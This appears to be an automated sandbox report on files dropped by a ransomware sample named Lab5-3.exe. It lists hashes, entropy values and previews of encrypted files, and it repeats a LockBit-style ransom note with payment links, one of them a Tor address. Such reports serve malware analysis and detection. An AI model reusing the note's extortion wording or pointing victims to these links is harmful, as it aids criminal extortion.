                                                                                                          SSDEEP:768:oXVvIh+0zSqMvtKkLycwN60/6MkYb7xLT7h4n/u9bNuK/iTqBbSe1JJphiumplB5:oXVAh+Km6N/Em94/vKLNJYagVZguVZ
                                                                                                          MD5:C15BA8F6E02FF6EACF4BA89C7F9CDF0D
                                                                                                          SHA1:69EBB42F727FF1A34FB1876DBB290D6D219EAA1D
                                                                                                          SHA-256:66D8109DFBFBBDC19638D9FACB19457F96E39F01AAF850F0431547CBB9DEB256
                                                                                                          SHA-512:B0F66DD61325249492DE4FA9B8A1444DECD01F258E0BD7E398A2854B68BD6EF162A8E1C18B6375124CEFCA628C15ED57033FBCC0EB4D14C0F5274469C37796C0
                                                                                                          Malicious:true
                                                                                                          Preview:.?8.{.g..l...v...U....I9NBW.....qMFp.w...i8d...4....F..>...jH....u(.k...._S.?.d.1..+DDQ.T..../..k.z.....A\..@..z....7.Q.~,.^.......z.4D.-".....}~..d?F.P.v\.o.F.6..U.%...a.....2.%.. ..?..o%.q(/..p_S$.X.5M..<'Z.....A6...x.[....7....NA..J.w...zl.Y.q..~.....O..:gS..f..O....g.d..y.....MMmk.]..j.9..`.*61........D$.s...!..Cr..~;.B..<f....}`%n5.7......X.a*...&B...+.....Zu....@...G....A'..I..O...P.h^...R......E.....Qa.j.a...}.lSK......... .rB......\.az.j..~W.....''#-..[.[...q.p[...[.r%.o.>}.@...H.......(.M...K22.k.U...1........`.]bV..h.J.j...1..65^.0....+..,..e...t..Y..?....{.Z...oK.q.a..p..P..a.&....?@JG..}.tvh.v...z&>..Q...&V...;4.Q.NG8..U-..'.......G.D.a..F....W.<.e.._..........I.w...:.N.oU_..M..B>;.....]k.9W]..Q0'.WLK..Q].nT......P;.$.L..V.i.Z........~...!%+Ol@..].o..IW....3..ujC..fr.... ..a8..Y.E.j.....$;~.w.x:.,..-..0........(.Z....),Y..}t.....k.u..j.AQ...5...........bh..Mcv..#7.W...c.s.:f..a.|V...;.S....cM.Y.9v...5.0."_........A..1N..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):52240
                                                                                                          Entropy (8bit):7.996755880886273
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:KRgMBu01uPY15H5LwTbo0zswQfuuNdxwqx4OZ:pMU80YwTzgNGMduqx4OZ
                                                                                                          MD5:453195044CCB8C4EF4054A1B49140BA8
                                                                                                          SHA1:3179BE462E1E770025417E316B15FA06693E28B1
                                                                                                          SHA-256:8A547504FC0747CC7C85EAD6F23157C211D78910AE0C866F96163D8748C2C7D4
                                                                                                          SHA-512:BB979850263097CB505D745CF04ED091A82DDCCF2DCEE9ECADA19DDA182BB3460F5A00528BF7A03D0FDAAF1401E60B229CBC4F7B9ABD05469F5D30845BC8C7CB
                                                                                                          Malicious:true
                                                                                                          Preview:.%....qlT..BIW..G....&e..G....N}.om......+.E.P...U..i........6j...L...(.YgC.)...m..)..gM.-y..u_.....<j.8......."..^|%4.&..Bkm.........E...9.."..>.....--. 33...;.v.o..,[.?w.CK^..S.z..F..'FX....u...9cL....3&E]E..1.....p...A;e>.$.d.J".P........a.M2+.....)=:..w.....$.E1.k...u`(...2.$....Q;....c.....zPQ..&....V...s(..W..t..).{DS=..........go[.;..C...7..q...Y.\...^...I..v.R......W'.>[........#.....E.[.@..'c...4...d...._.7...3.Yd.V...J...7..$Sq,.e....p.....-..62.R..2.....Cj...#-...D....1tA(s~"..E.r4..W...e...`M.[.../g......./....4.gYl...k..g.|.....H.)0"......N.P.e...@..\CYr.h0s...}.lO.I".2.T.8..s.A....z}3;........{.C...wyT.@RU.f..$/..q3~..%-...\.w8..|.`.PB.oxN....z....7.:?u....../OaR.kSoC....[.A.8...]2./.Bmy..e......(..#'.|..mXqkpL...v...A!.L....vlq...G...Fa.....1g..F.l.....&...|v|..c.`...I..mC[...B.XH......2..Gf.4D,..O}.<.....o.C..+.#l./.p.y.......9...$......Y.-]...z...... (.....}|.d.......-m....n......R?L-...-...k..!i.....b...[..b...V.f..P
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55472
                                                                                                          Entropy (8bit):7.996889104985749
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:K/yZcsiVzlhXrlyG155nfyz7PEf+QBy2QHqowTQRd6K3NiQ/AlHpY1Ku2JyS6m1u:Kscpzco5yHeBx+Fdl/kJdDp5JanZ
                                                                                                          MD5:96838E38D5D4A4D1AE71B6710F175D40
                                                                                                          SHA1:B83CC022E86E38528DE1464127F688D1E35264AB
                                                                                                          SHA-256:AEE6310E1C5DF6D86BA23D59B5A10BC875350CBEDB14A9082D88C231D28BC89E
                                                                                                          SHA-512:D398FAD97D8C199D2E03D3F9D52352A8FC8407A3A746E040E5174992E33E8B6AC84BBBBEFFA62071817A4AAB6C8E92154670F9A43047F51A22B3BB23E4C83F2D
                                                                                                          Malicious:true
                                                                                                          Preview:.iGl.Eh..8.....H.NRX..8............jW'....q.'.f.......~A.-9.!...xk.....WG...Y.Cw...2..q.x...)..F>\.<..#...2v.d.....Y./.|.K_.1b|..j...3U.}ALVzd..S..$..v...P..g.Q(E:.`.z........:wj..'...T..6S;...Z.....P.#....B.1#...l>..yr.4n....c..5.!...3q0.m..#.3CZ/..C.A.m.i%.K..{.....4Y7b`..uJ.V...]..[...`/..d..!.l..s380..3.}..>!.W.#U.*.....#.[m. \[..)<.........,.b.._;.U.M}...L.B...U..f.....g.m.#.....(....s/.}+...puj6.. ....~J..5..3g.5..C.rQ......B..F..PJ.C\......?V}>..cB.,z...%........V..*.)Y}V...$..U.u..r....rM_KX-..(p*j...@...f"5Xi\.&O.R.......#.r..|C.7.E._.r..V......U......H.pW.....{.+...I......H..@..?.H...Q.....2'G}@.v*..........4K...5.<sy.!..&..)....X.....HV.G.[vS....#.X.|<....<...n`..N<.;`.. N.L.L..@\Ozv0([RCj....&p,...}..*.<K....k.......+...A..N91|:.>.-..l..S.LZ.M.<.h.....kM..j.2.3M....r....%..<a.......p....Wd..d.Qr.{t.o...tj\.;....y...)-do....U....s..Q.a...*....P.a/"20...#...B.|..:.....`.#.B.LK6.d.cL.....Qg.Hj...9..0...^]V.~_UQFU.+n7
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):54432
                                                                                                          Entropy (8bit):7.996504405838959
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:59cVQkqNR6NBL0VX3Wya4BW/mpORqd+a/HX1ECqWi61Wf/MZ:7cVbq4D4F3I4BWupOIX/31E/Wi4Wf0Z
                                                                                                          MD5:2E28D70234E4961776681EF9376C244C
                                                                                                          SHA1:6C2A5F686B7675D7CF256A1BF5144FEC7895995D
                                                                                                          SHA-256:1A41302A2E4BD8E23E24F3D846852F15186234C575E77C9A8E0659C1E9ADC1C1
                                                                                                          SHA-512:C9AE602B147CCC16E1F41BF975340835720863DA5B6946EF5B475E9780B03D4AF95625897B59AB141CC5DF6F7FD111C82513272D87BF0B8082643A10F7E034D9
                                                                                                          Malicious:true
                                                                                                          Preview:..U...a...%t...i..u...Uu...>.V....yH.!g.O..N..9....mx#.S#NvT..F..tIjY..Q:}....w....\.0C.ay,@j%o....L..y6.2..2).c....n%..tz..(U./.>`[..?....D.m..0........^+.|T.3.V...r..(.P.i:.C..)+d..*......u..%.....e.k.l..>.=9.6S#T...B.E.:o..1D.}....r..c..G.K./n..W..........G.e`........0.Dh..m..P.q}..X.o6....#St.MC..J<H2.pi......`...9Wp..._z...1....S.u..?...3.\..7..4..6.^....[..N....|Z..3~=..m..bR.....i..p&./.%.e...(....)",.....:`s..Jp.........!..7..`.%.F."....A..B..ZV44...a....a..5.....y....c..h.>vT...=.(.%.j.....P... ....6.BK..W.+aK..2..w.}.........?g..jjJ8..(.2...&.&:<W........@g.C......;..L...~m.S...S.iT.]...t.Z./. c&.v..F..0.....N+.'N7.v..B1..N~)~tr|..Z....w....L....,.hRV.X.*\k-..8.....4.....pR..2.Y...?........g&..,$r...M...3.YRx.K...(..O4..9.u.D...lZ)...9..#.R......N..~. ..q.6.l......Y.I.}0W-.D.Gf.i...K........k..7.Ku........0._k......4..Ht.m.n....W.....R...S.a....*.+Y......-..Y.....u.:..(....q.....E9..E..j[.\.i...>'..*......&nj./...A.;A0.8I.r..jW{
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):50880
                                                                                                          Entropy (8bit):7.997189988721064
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:jH4Wt7bR6MCayrLh9ANPCWRQcMPovKEF1u5mnkBrCBGaXYMCq0lUaYZ:VlRpCayCJTjMwSEFM5mwrCMFM0GtZ
                                                                                                          MD5:D72032BC41CC79A0F4FDEC52AEE5ED36
                                                                                                          SHA1:A11CDE019FE6F93F945362031A5C8165F0517479
                                                                                                          SHA-256:172AC394A6028ABCB89DFE8D4E42A24F1AD05C91512626511DE0A5EFBC526EFA
                                                                                                          SHA-512:5426FB55FE72AFA02C9B81044E7F4897B16B9335A7575BA58BE9D80043DF3393BC152249119662434FE8007D93F3FCBE42B403030D4577860C91BABA49A9FD41
                                                                                                          Malicious:true
                                                                                                          Preview:.[.W.# ..*.y.n..l...q_.,..x...@v..^...Hc[...r^.1aV`...b......x....m-...@g.z\.....i..&S.e.Z.u."5s......<...X..\L3..k..GE.6.n.`.N..5:.....w.L24...w]z.{..T!.a33B/T.y...jb...zX.n......K..<q...(..J...._Q.yC.}......w...NwP.......O.....x.)...s...4...*l.....I3b....?.."].Wv..U......-.Yi.z.7.F.Z.b..*.|..<...D\9rj,......7 ...=.d.8......~.@..s.8...s.x.v1.j..E g.....r....&..%C:......js9.X..);}.(....%.c.Y.PX...j.U..<..........K........l.....e.Y./j.EqI\...7n..E.%...$.%....u#....D...78..#.-.iRI...A.........[.v.4:.L.j..D...a..N...m.M...o.R.....qH...?S.[.{.k.>"...V.....z..&`.....(....|..s..J"b.+.F.j'...'.+...o...^r..;K'........65oI.....x...z.r...q.(u.s... ....U.%...O..Wg.-.ogQ.*.P.d....*hoI5.E..9..<,..I.P..4.*.G...iR....Wj.K...#.z.y.....yY..)....o...M5..{.........#.th.....C.<}-.E..99u.`.]F../..0....Lr...A..B.j....q..RK..M.q.S9@n.>.....#.4sd...N.....&P.d.....L..b.w....:.yz4...{.z.Na.........f.V.CBI.Z<....S.....l....f-.LL.2..u.0^.].v.\@Q..=.>....>9B...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53472
                                                                                                          Entropy (8bit):7.99654180599862
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:p0taSwpLOvqAuscykN/kRqTPzKCvIkGJ2+Kqx7Hk+Bzk75KV5UK+2b94o6ECGWW4:p0cWhjITVIk787VBzk75G5AUXC1WkZ
                                                                                                          MD5:D24A6D07653F87620F40FD2D02EC5DC2
                                                                                                          SHA1:C5099CDFEABB11087F70E612809FB34CED22F3DE
                                                                                                          SHA-256:AF11BA817F69E754F674633B40A80F7F95727FBAAE77F21257FF288BDF787BC7
                                                                                                          SHA-512:E9B94868DFE15640DC877963C98B6B01BCF2BE2CD360630A6D8BCBB6E1DA053ABAE0D0965B039FF5932597EB512CA9D5A8B9E0B3CFF0DF0950D75084DB20E954
                                                                                                          Malicious:true
                                                                                                          Preview:.av[OxH....R;.........K.<.M.....P.....X....Zk.....C...E._...f4..@.N.>["S;...t....yi.[...~.......o...j..5E.s....zpZY...p...S.U=.. ......a[.6.&7....a......=9.....2.[.n...E:...#..1.'.-.8.g.K.K.DB^..+...#..P.g.."..1......s.+.+V/...~....lP4....V-.&.KK........w`..)...J......D..9....r~..2.5...!KQa......|...rf.H...lN.i...?x...x5.W.oA.T\...DvrT..:cC...../..Inm..T2l..j..{....u.\.|X...ae.eG./}R.1..Wo`+Y0.CV{..jU........46...j..K..u.e(Y......#.k_.N.1`...9....3./.j6......'....!M...Agk}...?C.....Q.......b&+?._.........j......3..6V.....~KTX..a.,..t.H.+.%."J._u...Q.J8q...r.Q.U.g..R....b.....U.Sv....l~..2.........-......'..).n.vd.e>.{......gL.._....qo/VW......i...~BT....~...m"..NQP!2...,..}.......>.D..+hQ..=.......<G.#)o'.A;..<....@P.b......Q...q..S4i..}...<w.F..6....Brz..M...+'......m).2:W.... .?>.)..)."..r*.E.TeA.....@......8xF..;......ok...hx).i..y...|N...~....r./[W...BC..G....-.....L&.'.Z.u....._=.....n..0..A5!...#.%.I7...j........R.1*....\]B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2608
                                                                                                          Entropy (8bit):7.928303942666527
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:W6NumbTSIJ9MAHQFGrHcylHfUTid3hBaUoSGFcmeykEdEElU92i:hDSaDQIrHp+Gx0uKeY2ElUJ
                                                                                                          MD5:0E78A48D056A305D23245EA0E587B205
                                                                                                          SHA1:D844EDC1E52BDE81FBF45EDB722B25CE99441DAC
                                                                                                          SHA-256:20C1926B36A759A2EAE05CEE302B30361579B3CB2E7C3A39101D0F0544058236
                                                                                                          SHA-512:EFEC6E2DC6FE9433B786231F9B3B36B41ABE708D12E41AFB6178FF4279935DB612275075592E186DBE21C07B78D980F147B1629E84C3C313D59C2785C6B02C2B
                                                                                                          Malicious:false
                                                                                                          Preview:..;....'..{e....m...2X'.!..E....ZS.../.....f...]...b[Y..=.....@..t...G.Y..c^...6...7PnC]...Q.s.....k.!;S...........9.x......{..9-..=8.`-.$_y...Z....@.I......t.@. =XY.R...]..D.......Jo.3lcU..T...F.g......l3..2...w.....'.T|.3'.F....S....E=..,.H@.x;M.....ic.:....CN...=.pI1'I....$..aI"5.{.*T...GH..<..x7~...c..k...C...8.1..78..X..........gfu..e..t.8.....mU.ON.S.E/%.....R...[$...r..c......^.....SX..n...!pm.Z..#+....'.:Y..o2.p..$..+>A*...u../..e..yv)..N}.<E..Z....v...H.\..-U1..%.._.:..T}u.. 'c28~xQ?.....?~...c.mkd....&...._.t.t..^w.^.C........>......v!f......t?c....KP.....Pk_...../.5...M.u...<..qhY..C..F.\G3.)...."#.j..F.t...I..,..<..[.*C......J.....1.d?7D'=../.%..t..i...B..'J<#L._v.gh7....#...@K..B.8.W..@..>.*u.b.T...An7..+.B...z..Tsp.5e.Q..=E3..s..i.@.............A}..g.....8..y.....k..D....f..v....V..&.A...y6..X..{;.&z.R]..*:%.l9h/........~y..,.c.<.zR.^...^..*j=.N.J......(TA..=Q..*.Y;...f..8P..:..,1..o&......}s^.t.Z.-.>...n..:|.U|...[...d
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):186192
                                                                                                          Entropy (8bit):7.999011876113836
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:FsjkUggJEXh2Ed0RjcFqXrINdogV+gQlCtUTwc4cTaykTYs0/7Y6uX8Z:HUjJEx2qyAP/owVa8c+ycGC8Z
                                                                                                          MD5:995267BC90847ABE4AFFA44FBB13A6F9
                                                                                                          SHA1:B9D4555849F2567FFE54B884E2498DBFC438C41B
                                                                                                          SHA-256:8F5AB2E7F2D6FA7797B0E53637E14C6A7119F14FC4A7D181DD4584BD6A7CA4E3
                                                                                                          SHA-512:CC9E02515D9FFF7663C88322865F5260E37D0D0D0027517EF2E1CD671825335B3C770B928ECD6876D37467CF2A8FAE320529D008385BB873E1CC8BD1E0BAA1E7
                                                                                                          Malicious:true
                                                                                                          Preview:...2..[7<...h.m.mzR*....?.+#6;......PY.V.....Z.x..F.4.b-.K>......l.......b.P.h..DU....fSGb.p..[..T..a|.t........1..D.m;.]..r...&.9..0p...../A....3....).dF...|..sH?.7..pF^^.Z&r..l.8....4P..:.1{am!.m/1..#.-Wh.b....gl.y...g.N..2R....g.....q..<M.6V.!.>...2.t..Kg.F..XL.L.5nM.;.P..4.`p.7.+.."...zr..IF...%.m+O`y....-.b1..E..q.hca..#.....^.@K..9D..x.....4.sm.u..1...=.^.&..?..iX....>...x.]G..t7V.Q!)..Xdm...^&WD...8P..f..FS..N1...]p..~...b..oA.vh..G.{m.V.X.}x=(....[...?..+..H..>>(.b ..G.=>..|U.z...XR..R...-.k.1<.:[..1...'T}.%{T.T...s.._.'.Tzv.....Y~:..&...T..?M..O....@..,v.....Q..d.....v.!.n.)?.np..(..XR....]...~q...Lse1..K..{..$...]V....6..'.x.e..".r..._.D...".R...uS...G...M.s.{...<...,.e.*..T..+.....O....=.>f.....I.g..^..-P.#..z.I.yk.*.l.)..\.{'1.EMU........?.+ac,M...|L.!.{RS......Qs....l........l...{..;.^..xE.S.tUb...w..7}.1...e..d.pq.^..c+p...$..?..WW:h!&.Z<.....!..$...{.L"3.A.......Bk...'..9...X5r......T.5...r....^W~......../....AP):..G,...I
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):405459
                                                                                                          Entropy (8bit):7.616880059362248
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:h1vsb4BDpRAvlhxO5jA/pl5by36ZptM8xrPOpX7YvvtShS2pUDIGeJfaSZ:MCDCXl5byqHtZQpX7Y3t6S2AeJfaG
                                                                                                          MD5:DAAA7C03F1544C126ED4915056CF6A4D
                                                                                                          SHA1:1AE8DEC10F6A6A49CD18993F7BD44DB2ED1D1699
                                                                                                          SHA-256:8F79DCCAEF30729E8ABD568345B49D7464EA2E9FD09B57D2E97CA35B7F3AD001
                                                                                                          SHA-512:4E032AAFAE4999D05A4B4E5EA64C0E7AEED33990046BC7276AD32E165109D64AB4D63F26D75BC4C82166BF0C027CACAB3E38E28940E6E57148E71A830DFA6A02
                                                                                                          Malicious:false
                                                                                                          Preview:...e.|..ux4....6..k.?+Z...=\.Q.$6...z[..Z..'b..=.......^..?.V..T....:|s.'f..~....}..>h...=.2..J..v...ifW..T....A-:0F.0.=....~.6*..>...D.%,!-.....}s..n....%Vm..v.Y....Z`p.2...........t....Y.LY.:t..h4..GN... Y..Q.G=..`A...D.~....N....b.A...X.../....q..V.'x..o.r....@.......is......".NH..>..y.a...cH. .X+..B..&..1...jj"..8.s.n..nI..v..S.1.=*.Ax.......3...)...DP..YH.U%.*.;{.....5"...D{........e..."..h.X...E..2r....e..b^..n!q.......t./.>...-._...(.V..;m.=+.4N...o.f.....k.d......>.%...Z.1.D....9.....L-.d,.H.....x..4....&+...h.c8.....$|.t.B:^KV..f.f.j.K.........>..A%Jq.....7^9+(.Q...`..V..3....E"..O.E..3.I.PO.~...9(84...b.e.|..g..;.GYj..=8.....f7.....{S...&...$.*...Y.r.:..Q.`f{.=....t..(......8.........oy>5[A.L.A....dJ..&.-q...~...........A....3.."|......U*.....P.+.3....[.X..b....?m..B,.W......Y.... [.,.(z.....X...j.9...#.h!..i..+..TJw.A.....q. c.....f.1....?.k7..%.N.h8v.y..^........V.&,.E.yg...J...;8G.."..,....c...H1%^'.T.. ~<x$]|.....v....O.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):186272
